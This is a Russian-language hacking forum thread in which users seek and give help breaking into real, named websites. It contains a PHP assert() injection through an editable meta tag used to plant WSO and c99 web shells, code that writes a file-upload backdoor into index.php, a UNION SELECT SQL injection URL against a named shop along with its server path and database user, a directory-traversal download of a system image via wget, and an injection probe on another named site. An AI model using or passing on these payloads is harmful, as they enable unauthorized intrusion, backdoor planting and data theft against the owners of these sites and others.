Ваши вопросы по уязвимостям.

Del, thx

 

Имеется возможность править html код страницы. Когда пишу <?php phpinfo(); ?> оно просто выводится браузером как обычный тег, будто работаю не с пхп страницей. Что можно сделать?

 

ничего

 

Кое как залил wso через file_get_contents а там такое и ничего не открывает из меню... Не Sec. Info не Console... В чем дело?

 

Попробуй с99 залить, возможно он будет работать

 

c99 вообще не заливается... дело в том, что я пытаюсь залить через
Через админку, через <meta name="keywords" content="" /> могу править только content так что вписал туда с начала <?assert($_REQUEST[x]);?> и залил wso и ничего не получилось, попробовал вписать " /><?assert($_REQUEST[x]);?><meta name="test" content="

чтоб запрос в индексе было
<meta name="keywords" content="" /><?assert($_REQUEST[x]);?><meta name="test" content="" />
и терь меню шелла доступно, но файлы не показывает, и в консолье команды не выполняются

 

Так можешь вписать вверху index.php?

<?php file_put_contents('lala.php', '<?php if(isset($_POST[ok])){if(move_uploaded_file($_FILES[fnm][tmp_name], $_POST[name])){echo "<a href=" . $_POST[name] . ">Click</a>";} else {die("err");}}?><form method=post enctype=multipart/form-data><input type=text name=name><input type=file name=fnm><br> <input type=submit name=ok><br></form>'); ?>

 

Как можно залиться, если доступа к табле юзеров нет?

http://www.elitdress.ru/catalog/product_info.php?products_id=-0+UNION+SELECT+1,2+--+

Известен путь: /var/www/masha/data/www/elitdress.ru/catalog/product_info.php
Известен юзер: masha_elitdress@localhost

Пробовал через char - не вышло.
В админку не попасть, хэши не брутятся.
Пытаюсь залиться через SQL.

 

сам же ответил на свой вопрос.
если file_priv нету или mq=on,
то через иньекцию залиться не получится.

 

Не могу выполнить ни одну команду в консоле, пишет Unable to execute command
OC Linux Kernel 2.6.32

 

Нашел и хочу скачать образ системы на сайте (доступно через directory traversal), но acunetix выдает ошибку, не могу мол так много качать и сбрасывает соединение (как повысить лимит, не нашел), если скормить ссылку браузеру, он выдает ахинею (возможно, с потерей информации) и при сохранении ее в файл образ не собирается. У разных браузеров файл получается разного размера, так что этот путь неверен. Flash Get ругается на ссылку и не хочет качать, естественно, ведь она имеет вид site?id=etc/linux.img
Может кто знает, какой проге надо это безобразие скормить, чтобы нормально скачалось?
Спасибо

 

wget site?id=etc/linux.img -O linux.img

 

Спасибо, получилось, только образ все равно не собирается почему-то (собирал, используя R-studio)

 

Возможно ли раскрутить?

 

допустим можно.
что дальше?

 

Нашел с помощью сканера. Может, кто подскажет как раскрутить? Не могу понять, куда писать запросы.
Как понял, знак %5c - это /

 

подскажите, можно что-то сделать с
http://www.kaifff.com/index.php?action=buy_now&BUYproducts_id=25'